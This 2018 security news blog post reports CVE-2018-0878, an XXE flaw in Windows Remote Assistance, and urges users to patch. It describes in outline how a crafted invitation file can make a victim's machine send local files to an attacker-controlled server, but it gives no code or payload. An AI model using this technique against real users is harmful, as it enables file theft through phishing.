21 Mar 2018

It is commonly known to all that you are not supposed to share remote access to your computer with any untrusted party for any reasons.

But we should also keep in mind that you shouldn’t trust anyone who invites you to fully access their computer remotely.

In Microsoft’s Windows Remote Assistance (Quick Assist) a new vulnerability have been detected which affects all versions of Windows including Windows 10, 8.1, RT 8.1, and 7, and this vulnerability is that it allows remote attackers to steal sensitive files on the attacked machine.

Windows Remote Assistance is a feature that allows anyone you trust to access your computer or you are allowed to access their computers remotely in order to fix any problems from anywhere around the world. This built-in-tool depends on the Remote Desktop Protocol (RDP) to establish a secure connection with the person’s computer.

An information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance that allows the attackers to get full information to compromise the targeted system has been discovered and reported by Nabeel Ahmed of Trend Micro Zero Day.

The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit). This vulnerability has been however fixed by the Microsoft’s patch Tuesday and it resides in the way Windows Remote Assistance processes XML External Entities (XXE).

The security patch for this vulnerability has been made public by releasing technical details and proof-of-concept exploit code for the flaw.

To exploit this defect which resides in MSXML3 parser, the attacker has to use “Out-of-Band Data Retrieval” attack technique by allowing the victim access to his/her computer via Windows Remote Assistance. There are 2 options available during the setting up of the Windows Remote Assistance, that is to invite someone to access your computer or to respond to someone who needs their computer to be accessed.

In the first option the users generate an invitation file, i.e. ‘invitation.msrcincident,’ which contains XML data with a lot of parameters and values required for authentication.

The parser cannot properly validate the content, so the hacker can simply send a specially crafted Remote Assistance invitation file that contains a malicious payload to the victim, tricking the targeted computer to submit the content of specific files from known locations to a remote server controlled by the attackers.

Microsoft explains that the stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. The hacker need not force a user to view the attacker-controlled content. But just have to convince a user to take action.

Ahmed says that this XXE vulnerability can be genuinely used in mass scale phishing attacks targeting individuals making them believe that they are truly helping another individual to fiz=x their issues. They are totally unaware that the .msrcincident invitation file could potentially result in loss of sensitive information.

It is highly recommended that the Windows users need to install the latest update for Windows Remote Assistance at the earliest.

Technical Writer,  Blogger,

Leave your thought